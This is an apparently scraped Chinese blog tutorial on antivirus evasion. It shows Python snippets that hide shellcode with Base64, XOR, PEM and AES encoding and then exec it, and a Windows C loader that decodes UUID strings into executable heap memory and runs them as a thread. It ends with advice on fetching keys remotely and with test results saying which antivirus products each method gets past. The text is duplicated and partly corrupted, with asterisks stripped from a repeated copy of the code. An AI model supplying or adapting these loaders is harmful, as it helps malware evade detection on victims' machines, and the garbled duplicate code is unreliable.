免杀之代码混淆技术详解<\/h1>

前言<\/h2>
代码混淆是绕过杀毒软件检测的重要手段之一。本文详细介绍了多种Python代码混淆技术，包括Base64加密、PyCryptodome模块的多种加密方式以及UUID转换技术，帮助开发者提高代码的隐蔽性。<\/p>

1. Base64模块混淆<\/h2>

1.1 Base64基本原理<\/h3>

Base64是一种基于64个可打印字符来表示二进制数据的编码方式。Python内置的base64<\/code>模块提供了多种Base64变体：<\/p>

__all__ =<\/span> [
<\/span><\/span>    # 传统RFC 2045 Base64编码<\/span>
<\/span><\/span>    'encode'<\/span>, 'decode'<\/span>, 'encodebytes'<\/span>, 'decodebytes'<\/span>,
<\/span><\/span>    # 通用接口<\/span>
<\/span><\/span>    'b64encode'<\/span>, 'b64decode'<\/span>, 'b32encode'<\/span>, 'b32decode'<\/span>, 'b16encode'<\/span>, 'b16decode'<\/span>,
<\/span><\/span>    # Base85和Ascii85编码<\/span>
<\/span><\/span>    'b85encode'<\/span>, 'b85decode'<\/span>, 'a85encode'<\/span>, 'a85decode'<\/span>,
<\/span><\/span>    # 标准Base64编码<\/span>
<\/span><\/span>    'standard_b64encode'<\/span>, 'standard_b64decode'<\/span>,
<\/span><\/span>    # URL安全Base64<\/span>
<\/span><\/span>    'urlsafe_b64encode'<\/span>, 'urlsafe_b64decode'<\/span>
<\/span><\/span>]
<\/span><\/span><\/code><\/pre>1.2 实际应用示例<\/h3>
import<\/span> base64
<\/span><\/span>import<\/span> ctypes
<\/span><\/span>
<\/span><\/span># 加密shellcode和代码<\/span>
<\/span><\/span>buf =<\/span> base64.<\/span>b64encode(b<\/span>"原始shellcode"<\/span>)
<\/span><\/span>code =<\/span> base64.<\/span>b64encode(b<\/span>"""shellcode执行代码"""<\/span>)
<\/span><\/span>
<\/span><\/span># 解密并执行<\/span>
<\/span><\/span>buf =<\/span> base64.<\/span>b64decode(b<\/span>'加密后的shellcode'<\/span>)
<\/span><\/span>code =<\/span> base64.<\/span>b64decode(b<\/span>'加密后的代码'<\/span>).<\/span>decode()
<\/span><\/span>exec(code)
<\/span><\/span><\/code><\/pre>注意事项<\/strong>：<\/p>

shellcode和代码需要分开处理<\/li>
简单Base64处理可能无法绕过360等杀毒软件<\/li>
需要结合其他混淆技术使用效果更佳<\/li>
<\/ul>
2. PyCryptodome模块混淆<\/h2>
PyCryptodome是PyCrypto的分支，提供了丰富的加密功能。<\/p>
2.1 主要功能模块<\/h3>



模块<\/th>
描述<\/th>
<\/tr>
<\/thead>


Crypto.Cipher<\/td>
加密解密数据(如AES)<\/td>
<\/tr>

Crypto.Signature<\/td>
创建和验证数字签名<\/td>
<\/tr>

Crypto.Hash<\/td>
创建加密摘要(如SHA-256)<\/td>
<\/tr>

Crypto.PublicKey<\/td>
生成、导出或导入公钥<\/td>
<\/tr>

Crypto.Protocol<\/td>
安全通信协议<\/td>
<\/tr>

Crypto.IO<\/td>
处理加密数据编码<\/td>
<\/tr>

Crypto.Random<\/td>
生成随机数据<\/td>
<\/tr>

Crypto.Util<\/td>
通用例程(如XOR)<\/td>
<\/tr>
<\/tbody>
<\/table>
2.2 XOR混淆技术<\/h3>
2.2.1 strxor.strxor<\/h4>
from<\/span> Crypto.Util import<\/span> strxor
<\/span><\/span>
<\/span><\/span>buf =<\/span> b<\/span>"shellcode"<\/span>
<\/span><\/span># 异或加密<\/span>
<\/span><\/span>buf =<\/span> strxor.<\/span>strxor(buf, ('c'<\/span> *<\/span> len(buf)).<\/span>encode(), None<\/span>)
<\/span><\/span># 异或解密<\/span>
<\/span><\/span>buf =<\/span> strxor.<\/span>strxor(buf, ('c'<\/span> *<\/span> len(buf)).<\/span>encode(), None<\/span>)
<\/span><\/span><\/code><\/pre>2.2.2 strxor.strxor_c<\/h4>
from<\/span> Crypto.Util import<\/span> strxor
<\/span><\/span>
<\/span><\/span>buf =<\/span> b<\/span>"shellcode"<\/span>
<\/span><\/span># 异或加密<\/span>
<\/span><\/span>buf =<\/span> strxor.<\/span>strxor_c(buf, 100<\/span>, None<\/span>)
<\/span><\/span># 异或解密<\/span>
<\/span><\/span>shellcode =<\/span> strxor.<\/span>strxor_c(buf, 100<\/span>, None<\/span>)
<\/span><\/span><\/code><\/pre>2.3 PEM编码混淆<\/h3>
from<\/span> Crypto.IO import<\/span> PEM
<\/span><\/span>
<\/span><\/span># 加密<\/span>
<\/span><\/span>buf =<\/span> PEM.<\/span>encode(b<\/span>"原始数据"<\/span>, marker=<\/span>"shellcode"<\/span>, passphrase=<\/span>None<\/span>, randfunc=<\/span>None<\/span>)
<\/span><\/span>
<\/span><\/span># 解密<\/span>
<\/span><\/span>shellcode =<\/span> bytearray(PEM.<\/span>decode(buf, passphrase=<\/span>None<\/span>)[0<\/span>])
<\/span><\/span><\/code><\/pre>2.4 AES加密混淆<\/h3>
from<\/span> Crypto.Cipher import<\/span> AES
<\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad
<\/span><\/span>from<\/span> Crypto.Random import<\/span> get_random_bytes
<\/span><\/span>
<\/span><\/span># 加密<\/span>
<\/span><\/span>key =<\/span> get_random_bytes(16<\/span>)  # 16字节密钥<\/span>
<\/span><\/span>iv =<\/span> b<\/span>'0'<\/span> *<\/span> 16<\/span>  # 16字节初始化向量<\/span>
<\/span><\/span>aes =<\/span> AES.<\/span>new(key, mode=<\/span>AES.<\/span>MODE_CBC, iv=<\/span>iv)
<\/span><\/span>shellcode =<\/span> aes.<\/span>encrypt(pad(buf, AES.<\/span>block_size))
<\/span><\/span>
<\/span><\/span># 解密<\/span>
<\/span><\/span>aes2 =<\/span> AES.<\/span>new(key, AES.<\/span>MODE_CBC, iv=<\/span>iv)
<\/span><\/span>print(aes2.<\/span>decrypt(shellcode))
<\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p>

必须保存好key和iv才能正确解密<\/li>
可以使用MODE_CBC或MODE_EAX等模式<\/li>
需要处理填充(padding)<\/li>
<\/ul>
3. UUID混淆技术<\/h2>
UUID(通用唯一标识符)可以用于shellcode转换。<\/p>
3.1 Python生成UUID<\/h3>
from<\/span> uuid import<\/span> UUID
<\/span><\/span>
<\/span><\/span>buf =<\/span> b<\/span>"shellcode"<\/span>
<\/span><\/span># 补齐16的倍数<\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    if<\/span> len(buf) %<\/span> 16<\/span> ==<\/span> 0<\/span>:
<\/span><\/span>        break<\/span>
<\/span><\/span>    else<\/span>:
<\/span><\/span>        buf +=<\/span> b<\/span>'<\/span>\x00<\/span>'<\/span>
<\/span><\/span>
<\/span><\/span># 生成UUID列表<\/span>
<\/span><\/span>uuid_list =<\/span> []
<\/span><\/span>for<\/span> i in<\/span> range(int(len(buf)\/<\/span>16<\/span>)):
<\/span><\/span>    uuid_list.<\/span>append(str(UUID(bytes_le=<\/span>buf[i*<\/span>16<\/span>:16<\/span>+<\/span>i*<\/span>16<\/span>])))
<\/span><\/span><\/code><\/pre>3.2 C语言执行UUID shellcode<\/h3>
#include<\/span> <Windows.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib, "Rpcrt4.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    const<\/span> char<\/span>*<\/span> uuid[] =<\/span> {
<\/span><\/span>        "生成的UUID字符串1"<\/span>,
<\/span><\/span>        "生成的UUID字符串2"<\/span>,
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    };
<\/span><\/span>    
<\/span><\/span>    \/\/ 申请可执行堆空间
<\/span><\/span><\/span><\/span>    HANDLE hHeap =<\/span> HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof<\/span>(uuid)*<\/span>16<\/span>, 0<\/span>);
<\/span><\/span>    LPVOID hHeapMemory =<\/span> HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof<\/span>(uuid)*<\/span>16<\/span>);
<\/span><\/span>    DWORD_PTR hPtr =<\/span> (DWORD_PTR)hHeapMemory;
<\/span><\/span>    
<\/span><\/span>    \/\/ 转换UUID为二进制
<\/span><\/span><\/span><\/span>    for<\/span>(int<\/span> i=<\/span>0<\/span>; i<<\/span>(sizeof<\/span>(uuid)\/<\/span>sizeof<\/span>(uuid[0<\/span>])); i++<\/span>) {
<\/span><\/span>        UuidFromStringA((RPC_CSTR)uuid[i], (UUID*<\/span>)hPtr);
<\/span><\/span>        hPtr +=<\/span> 16<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 执行shellcode
<\/span><\/span><\/span><\/span>    HANDLE hThread =<\/span> CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)hHeapMemory, NULL, NULL, 0<\/span>);
<\/span><\/span>    WaitForSingleObject(hThread, INFINITE);
<\/span><\/span>    
<\/span><\/span>    \/\/ 清理
<\/span><\/span><\/span><\/span>    CloseHandle(hThread);
<\/span><\/span>    HeapFree(hHeap, HEAP_NO_SERIALIZE, hHeapMemory);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 综合建议<\/h2>

组合使用多种技术<\/strong>：单一混淆方式容易被检测，建议组合使用Base64、XOR、AES等多种技术<\/li>
关键参数分离<\/strong>：将解密密钥、IV等关键参数与主程序分离，通过远程获取或动态生成<\/li>
体积考虑<\/strong>：Python编译后体积较大，可以考虑使用Go等语言实现类似功能<\/li>
测试验证<\/strong>：必须在实际环境中测试混淆效果，不同杀毒软件检测机制不同<\/li>
持续更新<\/strong>：杀毒软件特征库不断更新，混淆技术也需要持续演进<\/li>
<\/ol>
5. 免杀效果评估<\/h2>
经过测试：<\/p>

简单Base64处理：可过火绒、Windows Defender，但360运行后报毒<\/li>
PEM加密处理：可过火绒、Windows Defender和360<\/li>
AES加密处理：效果良好，但需要妥善保管密钥<\/li>
UUID转换：效果取决于具体实现方式<\/li>
<\/ul>
注意<\/strong>：免杀效果会随时间变化，需要定期测试和调整技术方案。<\/p>

模块<\/th>	描述<\/th> <\/tr> <\/thead>
Crypto.Cipher<\/td>	加密解密数据(如AES)<\/td> <\/tr>
Crypto.Signature<\/td>	创建和验证数字签名<\/td> <\/tr>
Crypto.Hash<\/td>	创建加密摘要(如SHA-256)<\/td> <\/tr>
Crypto.PublicKey<\/td>	生成、导出或导入公钥<\/td> <\/tr>
Crypto.Protocol<\/td>	安全通信协议<\/td> <\/tr>
Crypto.IO<\/td>	处理加密数据编码<\/td> <\/tr>
Crypto.Random<\/td>	生成随机数据<\/td> <\/tr>
Crypto.Util<\/td>	通用例程(如XOR)<\/td> <\/tr> <\/tbody> <\/table> 2.2 XOR混淆技术<\/h3> 2.2.1 strxor.strxor<\/h4> from<\/span> Crypto.Util import<\/span> strxor <\/span><\/span> <\/span><\/span>buf =<\/span> b<\/span>"shellcode"<\/span> <\/span><\/span># 异或加密<\/span> <\/span><\/span>buf =<\/span> strxor.<\/span>strxor(buf, ('c'<\/span> <\/span> len(buf)).<\/span>encode(), None<\/span>) <\/span><\/span># 异或解密<\/span> <\/span><\/span>buf =<\/span> strxor.<\/span>strxor(buf, ('c'<\/span> <\/span> len(buf)).<\/span>encode(), None<\/span>) <\/span><\/span><\/code><\/pre>2.2.2 strxor.strxor_c<\/h4> from<\/span> Crypto.Util import<\/span> strxor <\/span><\/span> <\/span><\/span>buf =<\/span> b<\/span>"shellcode"<\/span> <\/span><\/span># 异或加密<\/span> <\/span><\/span>buf =<\/span> strxor.<\/span>strxor_c(buf, 100<\/span>, None<\/span>) <\/span><\/span># 异或解密<\/span> <\/span><\/span>shellcode =<\/span> strxor.<\/span>strxor_c(buf, 100<\/span>, None<\/span>) <\/span><\/span><\/code><\/pre>2.3 PEM编码混淆<\/h3> from<\/span> Crypto.IO import<\/span> PEM <\/span><\/span> <\/span><\/span># 加密<\/span> <\/span><\/span>buf =<\/span> PEM.<\/span>encode(b<\/span>"原始数据"<\/span>, marker=<\/span>"shellcode"<\/span>, passphrase=<\/span>None<\/span>, randfunc=<\/span>None<\/span>) <\/span><\/span> <\/span><\/span># 解密<\/span> <\/span><\/span>shellcode =<\/span> bytearray(PEM.<\/span>decode(buf, passphrase=<\/span>None<\/span>)[0<\/span>]) <\/span><\/span><\/code><\/pre>2.4 AES加密混淆<\/h3> from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad <\/span><\/span>from<\/span> Crypto.Random import<\/span> get_random_bytes <\/span><\/span> <\/span><\/span># 加密<\/span> <\/span><\/span>key =<\/span> get_random_bytes(16<\/span>) # 16字节密钥<\/span> <\/span><\/span>iv =<\/span> b<\/span>'0'<\/span> <\/span> 16<\/span> # 16字节初始化向量<\/span> <\/span><\/span>aes =<\/span> AES.<\/span>new(key, mode=<\/span>AES.<\/span>MODE_CBC, iv=<\/span>iv) <\/span><\/span>shellcode =<\/span> aes.<\/span>encrypt(pad(buf, AES.<\/span>block_size)) <\/span><\/span> <\/span><\/span># 解密<\/span> <\/span><\/span>aes2 =<\/span> AES.<\/span>new(key, AES.<\/span>MODE_CBC, iv=<\/span>iv) <\/span><\/span>print(aes2.<\/span>decrypt(shellcode)) <\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p> 必须保存好key和iv才能正确解密<\/li> 可以使用MODE_CBC或MODE_EAX等模式<\/li> 需要处理填充(padding)<\/li> <\/ul> 3. UUID混淆技术<\/h2> UUID(通用唯一标识符)可以用于shellcode转换。<\/p> 3.1 Python生成UUID<\/h3> from<\/span> uuid import<\/span> UUID <\/span><\/span> <\/span><\/span>buf =<\/span> b<\/span>"shellcode"<\/span> <\/span><\/span># 补齐16的倍数<\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> if<\/span> len(buf) %<\/span> 16<\/span> ==<\/span> 0<\/span>: <\/span><\/span> break<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> buf +=<\/span> b<\/span>'<\/span>\x00<\/span>'<\/span> <\/span><\/span> <\/span><\/span># 生成UUID列表<\/span> <\/span><\/span>uuid_list =<\/span> [] <\/span><\/span>for<\/span> i in<\/span> range(int(len(buf)\/<\/span>16<\/span>)): <\/span><\/span> uuid_list.<\/span>append(str(UUID(bytes_le=<\/span>buf[i<\/span>16<\/span>:16<\/span>+<\/span>i<\/span>16<\/span>]))) <\/span><\/span><\/code><\/pre>3.2 C语言执行UUID shellcode<\/h3> #include<\/span> <Windows.h><\/span> <\/span><\/span><\/span>#pragma comment(lib, "Rpcrt4.lib") <\/span><\/span><\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> const<\/span> char<\/span><\/span> uuid[] =<\/span> { <\/span><\/span> "生成的UUID字符串1"<\/span>, <\/span><\/span> "生成的UUID字符串2"<\/span>, <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }; <\/span><\/span> <\/span><\/span> \/\/ 申请可执行堆空间 <\/span><\/span><\/span><\/span> HANDLE hHeap =<\/span> HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof<\/span>(uuid)<\/span>16<\/span>, 0<\/span>); <\/span><\/span> LPVOID hHeapMemory =<\/span> HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof<\/span>(uuid)<\/span>16<\/span>); <\/span><\/span> DWORD_PTR hPtr =<\/span> (DWORD_PTR)hHeapMemory; <\/span><\/span> <\/span><\/span> \/\/ 转换UUID为二进制 <\/span><\/span><\/span><\/span> for<\/span>(int<\/span> i=<\/span>0<\/span>; i<<\/span>(sizeof<\/span>(uuid)\/<\/span>sizeof<\/span>(uuid[0<\/span>])); i++<\/span>) { <\/span><\/span> UuidFromStringA((RPC_CSTR)uuid[i], (UUID*<\/span>)hPtr); <\/span><\/span> hPtr +=<\/span> 16<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 执行shellcode <\/span><\/span><\/span><\/span> HANDLE hThread =<\/span> CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)hHeapMemory, NULL, NULL, 0<\/span>); <\/span><\/span> WaitForSingleObject(hThread, INFINITE); <\/span><\/span> <\/span><\/span> \/\/ 清理 <\/span><\/span><\/span><\/span> CloseHandle(hThread); <\/span><\/span> HeapFree(hHeap, HEAP_NO_SERIALIZE, hHeapMemory); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>4. 综合建议<\/h2> 组合使用多种技术<\/strong>：单一混淆方式容易被检测，建议组合使用Base64、XOR、AES等多种技术<\/li> 关键参数分离<\/strong>：将解密密钥、IV等关键参数与主程序分离，通过远程获取或动态生成<\/li> 体积考虑<\/strong>：Python编译后体积较大，可以考虑使用Go等语言实现类似功能<\/li> 测试验证<\/strong>：必须在实际环境中测试混淆效果，不同杀毒软件检测机制不同<\/li> 持续更新<\/strong>：杀毒软件特征库不断更新，混淆技术也需要持续演进<\/li> <\/ol> 5. 免杀效果评估<\/h2> 经过测试：<\/p> 简单Base64处理：可过火绒、Windows Defender，但360运行后报毒<\/li> PEM加密处理：可过火绒、Windows Defender和360<\/li> AES加密处理：效果良好，但需要妥善保管密钥<\/li> UUID转换：效果取决于具体实现方式<\/li> <\/ul> 注意<\/strong>：免杀效果会随时间变化，需要定期测试和调整技术方案。<\/p>

免杀之代码混淆技术详解<\/h1>

前言<\/h2> 代码混淆是绕过杀毒软件检测的重要手段之一。本文详细介绍了多种Python代码混淆技术，包括Base64加密、PyCryptodome模块的多种加密方式以及UUID转换技术，帮助开发者提高代码的隐蔽性。<\/p>

1. Base64模块混淆<\/h2>

2. PyCryptodome模块混淆<\/h2> PyCryptodome是PyCrypto的分支，提供了丰富的加密功能。<\/p>

2.2 XOR混淆技术<\/h3>

3. UUID混淆技术<\/h2> UUID(通用唯一标识符)可以用于shellcode转换。<\/p>

前言<\/h2>
代码混淆是绕过杀毒软件检测的重要手段之一。本文详细介绍了多种Python代码混淆技术，包括Base64加密、PyCryptodome模块的多种加密方式以及UUID转换技术，帮助开发者提高代码的隐蔽性。<\/p>

2. PyCryptodome模块混淆<\/h2>
PyCryptodome是PyCrypto的分支，提供了丰富的加密功能。<\/p>

3. UUID混淆技术<\/h2>
UUID(通用唯一标识符)可以用于shellcode转换。<\/p>